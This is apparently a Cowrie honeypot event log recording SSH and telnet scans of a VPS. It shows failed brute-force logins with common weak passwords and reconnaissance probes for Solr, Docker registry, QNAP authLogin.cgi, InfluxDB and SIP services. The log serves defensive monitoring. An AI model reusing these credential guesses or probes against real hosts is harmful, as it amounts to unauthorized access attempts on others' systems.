{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:44:12.201159Z","src_ip":"185.93.89.7","session":"2d3891c348f2"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:44:12.218189Z","src_ip":"185.93.89.7","session":"2d3891c348f2"}
{"eventid":"cowrie.login.failed","username":"index","password":"qwerty1","message":"login attempt [index/qwerty1] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:12.272116Z","src_ip":"185.93.89.7","session":"2d3891c348f2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:13.293549Z","src_ip":"185.93.89.7","session":"2d3891c348f2"}
{"eventid":"cowrie.session.closed","duration":5.005188941955566,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:13.527588Z","src_ip":"157.230.111.73","session":"5c318468b70c"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":21131,"dst_ip":"1.2.3.4","dst_port":23,"session":"dd059ad1a6eb","protocol":"telnet","message":"New connection: 157.230.111.73:21131 (1.2.3.4:23) [session: dd059ad1a6eb]","sensor":"my-vps","timestamp":"2025-08-28T09:44:13.538336Z"}
{"eventid":"cowrie.session.closed","duration":5.003339052200317,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:18.541620Z","src_ip":"157.230.111.73","session":"dd059ad1a6eb"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":4293,"dst_ip":"1.2.3.4","dst_port":23,"session":"5c5e8d25c127","protocol":"telnet","message":"New connection: 157.230.111.73:4293 (1.2.3.4:23) [session: 5c5e8d25c127]","sensor":"my-vps","timestamp":"2025-08-28T09:44:18.552058Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":33454,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ca9f32249c8","protocol":"ssh","message":"New connection: 51.79.164.132:33454 (1.2.3.4:22) [session: 0ca9f32249c8]","sensor":"my-vps","timestamp":"2025-08-28T09:44:21.201967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:44:21.359475Z","src_ip":"51.79.164.132","session":"0ca9f32249c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:44:21.912481Z","src_ip":"51.79.164.132","session":"0ca9f32249c8"}
{"eventid":"cowrie.login.failed","username":"www","password":"123456","message":"login attempt [www/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:23.392080Z","src_ip":"51.79.164.132","session":"0ca9f32249c8"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:24.895813Z","src_ip":"51.79.164.132","session":"0ca9f32249c8"}
{"eventid":"cowrie.session.closed","duration":7.5071022510528564,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:26.059089Z","src_ip":"157.230.111.73","session":"5c5e8d25c127"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":22055,"dst_ip":"1.2.3.4","dst_port":23,"session":"0cd48cc0a72f","protocol":"telnet","message":"New connection: 157.230.111.73:22055 (1.2.3.4:23) [session: 0cd48cc0a72f]","sensor":"my-vps","timestamp":"2025-08-28T09:44:26.069727Z"}
{"eventid":"cowrie.session.closed","duration":5.00127649307251,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:31.070941Z","src_ip":"157.230.111.73","session":"0cd48cc0a72f"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":12311,"dst_ip":"1.2.3.4","dst_port":23,"session":"e133d9e68570","protocol":"telnet","message":"New connection: 157.230.111.73:12311 (1.2.3.4:23) [session: e133d9e68570]","sensor":"my-vps","timestamp":"2025-08-28T09:44:31.082166Z"}
{"eventid":"cowrie.session.closed","duration":0.0010192394256591797,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:31.083112Z","src_ip":"157.230.111.73","session":"e133d9e68570"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":18899,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a0d1a778d84","protocol":"telnet","message":"New connection: 157.230.111.73:18899 (1.2.3.4:23) [session: 1a0d1a778d84]","sensor":"my-vps","timestamp":"2025-08-28T09:44:31.104313Z"}
{"eventid":"cowrie.session.closed","duration":5.005376577377319,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.109626Z","src_ip":"157.230.111.73","session":"1a0d1a778d84"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":2967,"dst_ip":"1.2.3.4","dst_port":23,"session":"be402736c029","protocol":"telnet","message":"New connection: 157.230.111.73:2967 (1.2.3.4:23) [session: be402736c029]","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.120102Z"}
{"eventid":"cowrie.session.closed","duration":0.0015726089477539062,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.121578Z","src_ip":"157.230.111.73","session":"be402736c029"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":18217,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e1789d007e2","protocol":"telnet","message":"New connection: 157.230.111.73:18217 (1.2.3.4:23) [session: 4e1789d007e2]","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.142905Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37978,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a5f27a95bec","protocol":"ssh","message":"New connection: 185.93.89.7:37978 (1.2.3.4:22) [session: 9a5f27a95bec]","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.310750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.329517Z","src_ip":"185.93.89.7","session":"9a5f27a95bec"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.330149Z","src_ip":"185.93.89.7","session":"9a5f27a95bec"}
{"eventid":"cowrie.login.failed","username":"index","password":"azerty","message":"login attempt [index/azerty] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:36.486789Z","src_ip":"185.93.89.7","session":"9a5f27a95bec"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:37.509316Z","src_ip":"185.93.89.7","session":"9a5f27a95bec"}
{"eventid":"cowrie.session.closed","duration":5.00360894203186,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:41.146453Z","src_ip":"157.230.111.73","session":"4e1789d007e2"}
{"eventid":"cowrie.session.connect","src_ip":"157.230.111.73","src_port":8661,"dst_ip":"1.2.3.4","dst_port":23,"session":"ff313efa0590","protocol":"telnet","message":"New connection: 157.230.111.73:8661 (1.2.3.4:23) [session: ff313efa0590]","sensor":"my-vps","timestamp":"2025-08-28T09:44:41.157960Z"}
{"eventid":"cowrie.login.failed","username":"OPTIONS sip:nm SIP/2.0","password":"Via: SIP/2.0/TCP nm;branch=foo","message":"login attempt [OPTIONS sip:nm SIP/2.0/Via: SIP/2.0/TCP nm;branch=foo] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:41.159569Z","src_ip":"157.230.111.73","session":"ff313efa0590"}
{"eventid":"cowrie.login.failed","username":"From: <sip:nm@nm>;tag=root","password":"To: <sip:nm2@nm2>","message":"login attempt [From: <sip:nm@nm>;tag=root/To: <sip:nm2@nm2>] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:41.160424Z","src_ip":"157.230.111.73","session":"ff313efa0590"}
{"eventid":"cowrie.login.failed","username":"Call-ID: 50000","password":"CSeq: 42 OPTIONS","message":"login attempt [Call-ID: 50000/CSeq: 42 OPTIONS] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:41.161411Z","src_ip":"157.230.111.73","session":"ff313efa0590"}
{"eventid":"cowrie.login.failed","username":"Max-Forwards: 70","password":"Content-Length: 0","message":"login attempt [Max-Forwards: 70/Content-Length: 0] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:41.162347Z","src_ip":"157.230.111.73","session":"ff313efa0590"}
{"eventid":"cowrie.login.failed","username":"Contact: <sip:nm@nm>","password":"Accept: application/sdp","message":"login attempt [Contact: <sip:nm@nm>/Accept: application/sdp] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:41.163173Z","src_ip":"157.230.111.73","session":"ff313efa0590"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49956,"dst_ip":"1.2.3.4","dst_port":22,"session":"aee7094cde33","protocol":"ssh","message":"New connection: 51.79.164.132:49956 (1.2.3.4:22) [session: aee7094cde33]","sensor":"my-vps","timestamp":"2025-08-28T09:44:47.008242Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:44:47.154457Z","src_ip":"51.79.164.132","session":"aee7094cde33"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:44:47.657970Z","src_ip":"51.79.164.132","session":"aee7094cde33"}
{"eventid":"cowrie.session.closed","duration":7.504521131515503,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.662367Z","src_ip":"157.230.111.73","session":"ff313efa0590"}
{"eventid":"cowrie.session.connect","src_ip":"165.232.78.158","src_port":43526,"dst_ip":"1.2.3.4","dst_port":23,"session":"db745e660ca4","protocol":"telnet","message":"New connection: 165.232.78.158:43526 (1.2.3.4:23) [session: db745e660ca4]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.804481Z"}
{"eventid":"cowrie.session.connect","src_ip":"161.35.201.222","src_port":44182,"dst_ip":"1.2.3.4","dst_port":23,"session":"330fd3a108f5","protocol":"telnet","message":"New connection: 161.35.201.222:44182 (1.2.3.4:23) [session: 330fd3a108f5]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.806471Z"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.67.179","src_port":57054,"dst_ip":"1.2.3.4","dst_port":23,"session":"eabc0b1b3dd8","protocol":"telnet","message":"New connection: 64.226.67.179:57054 (1.2.3.4:23) [session: eabc0b1b3dd8]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.807206Z"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.221.229","src_port":40836,"dst_ip":"1.2.3.4","dst_port":23,"session":"7203b62fb57d","protocol":"telnet","message":"New connection: 68.183.221.229:40836 (1.2.3.4:23) [session: 7203b62fb57d]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.808105Z"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.30.84","src_port":14872,"dst_ip":"1.2.3.4","dst_port":23,"session":"e612692c78ce","protocol":"telnet","message":"New connection: 104.248.30.84:14872 (1.2.3.4:23) [session: e612692c78ce]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.808956Z"}
{"eventid":"cowrie.session.connect","src_ip":"159.89.7.63","src_port":13586,"dst_ip":"1.2.3.4","dst_port":23,"session":"a4c4519ec005","protocol":"telnet","message":"New connection: 159.89.7.63:13586 (1.2.3.4:23) [session: a4c4519ec005]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.809809Z"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.67.179","src_port":57070,"dst_ip":"1.2.3.4","dst_port":23,"session":"3cbe346fef91","protocol":"telnet","message":"New connection: 64.226.67.179:57070 (1.2.3.4:23) [session: 3cbe346fef91]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.810539Z"}
{"eventid":"cowrie.session.closed","duration":0.007127523422241211,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.811527Z","src_ip":"165.232.78.158","session":"db745e660ca4"}
{"eventid":"cowrie.login.failed","username":"GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.812510Z","src_ip":"64.226.67.179","session":"eabc0b1b3dd8"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.813643Z","src_ip":"64.226.67.179","session":"eabc0b1b3dd8"}
{"eventid":"cowrie.login.failed","username":"GET / HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET / HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.814654Z","src_ip":"68.183.221.229","session":"7203b62fb57d"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)","password":"Accept: */*","message":"login attempt [User-Agent: Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)/Accept: */*] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.815677Z","src_ip":"68.183.221.229","session":"7203b62fb57d"}
{"eventid":"cowrie.login.failed","username":"Accept-Encoding: gzip","password":"","message":"login attempt [Accept-Encoding: gzip/] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.816772Z","src_ip":"68.183.221.229","session":"7203b62fb57d"}
{"eventid":"cowrie.login.failed","username":"GET /solr/admin/info/system HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /solr/admin/info/system HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.817614Z","src_ip":"104.248.30.84","session":"e612692c78ce"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.818432Z","src_ip":"104.248.30.84","session":"e612692c78ce"}
{"eventid":"cowrie.login.failed","username":"GET /v2/_catalog HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /v2/_catalog HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.821194Z","src_ip":"159.89.7.63","session":"a4c4519ec005"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.822158Z","src_ip":"159.89.7.63","session":"a4c4519ec005"}
{"eventid":"cowrie.login.failed","username":"GET /cgi-bin/authLogin.cgi HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /cgi-bin/authLogin.cgi HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.823516Z","src_ip":"64.226.67.179","session":"3cbe346fef91"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.824404Z","src_ip":"64.226.67.179","session":"3cbe346fef91"}
{"eventid":"cowrie.session.closed","duration":0.01838994026184082,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.825529Z","src_ip":"64.226.67.179","session":"eabc0b1b3dd8"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.67.179","src_port":57072,"dst_ip":"1.2.3.4","dst_port":23,"session":"7373ecacda9d","protocol":"telnet","message":"New connection: 64.226.67.179:57072 (1.2.3.4:23) [session: 7373ecacda9d]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.826348Z"}
{"eventid":"cowrie.session.closed","duration":0.0012536048889160156,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.827542Z","src_ip":"64.226.67.179","session":"7373ecacda9d"}
{"eventid":"cowrie.session.closed","duration":0.020168781280517578,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.828234Z","src_ip":"68.183.221.229","session":"7203b62fb57d"}
{"eventid":"cowrie.session.closed","duration":0.0212552547454834,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.830112Z","src_ip":"104.248.30.84","session":"e612692c78ce"}
{"eventid":"cowrie.session.connect","src_ip":"165.232.78.158","src_port":43538,"dst_ip":"1.2.3.4","dst_port":23,"session":"e84c4ee9ee4f","protocol":"telnet","message":"New connection: 165.232.78.158:43538 (1.2.3.4:23) [session: e84c4ee9ee4f]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.832474Z"}
{"eventid":"cowrie.session.closed","duration":0.0009100437164306641,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.833274Z","src_ip":"165.232.78.158","session":"e84c4ee9ee4f"}
{"eventid":"cowrie.session.closed","duration":0.024693727493286133,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.834173Z","src_ip":"159.89.7.63","session":"a4c4519ec005"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.67.179","src_port":57074,"dst_ip":"1.2.3.4","dst_port":23,"session":"7303db02b34c","protocol":"telnet","message":"New connection: 64.226.67.179:57074 (1.2.3.4:23) [session: 7303db02b34c]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.835902Z"}
{"eventid":"cowrie.session.closed","duration":0.02619171142578125,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.836692Z","src_ip":"64.226.67.179","session":"3cbe346fef91"}
{"eventid":"cowrie.login.failed","username":"GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.837345Z","src_ip":"64.226.67.179","session":"7303db02b34c"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.838096Z","src_ip":"64.226.67.179","session":"7303db02b34c"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.221.229","src_port":40848,"dst_ip":"1.2.3.4","dst_port":23,"session":"d16e7fe4c2a6","protocol":"telnet","message":"New connection: 68.183.221.229:40848 (1.2.3.4:23) [session: d16e7fe4c2a6]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.839007Z"}
{"eventid":"cowrie.session.connect","src_ip":"104.248.30.84","src_port":14880,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f39430fc651","protocol":"telnet","message":"New connection: 104.248.30.84:14880 (1.2.3.4:23) [session: 4f39430fc651]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.840359Z"}
{"eventid":"cowrie.session.closed","duration":0.0025670528411865234,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.841520Z","src_ip":"68.183.221.229","session":"d16e7fe4c2a6"}
{"eventid":"cowrie.login.failed","username":"GET /solr/admin/info/system HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /solr/admin/info/system HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.842539Z","src_ip":"104.248.30.84","session":"4f39430fc651"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.844011Z","src_ip":"104.248.30.84","session":"4f39430fc651"}
{"eventid":"cowrie.session.connect","src_ip":"159.89.7.63","src_port":13596,"dst_ip":"1.2.3.4","dst_port":23,"session":"56b7d5701c6c","protocol":"telnet","message":"New connection: 159.89.7.63:13596 (1.2.3.4:23) [session: 56b7d5701c6c]","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.845166Z"}
{"eventid":"cowrie.login.failed","username":"GET /v2/_catalog HTTP/1.1","password":"Host: 1.2.3.4:23","message":"login attempt [GET /v2/_catalog HTTP/1.1/Host: 1.2.3.4:23] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.846333Z","src_ip":"159.89.7.63","session":"56b7d5701c6c"}
{"eventid":"cowrie.login.failed","username":"User-Agent: Go-http-client/1.1","password":"Connection: close","message":"login attempt [User-Agent: Go-http-client/1.1/Connection: close] failed","sensor":"my-vps","timestamp":"2025-08-28T09:44:48.847270Z","src_ip":"159.89.7.63","session":"56b7d5701c6c"}
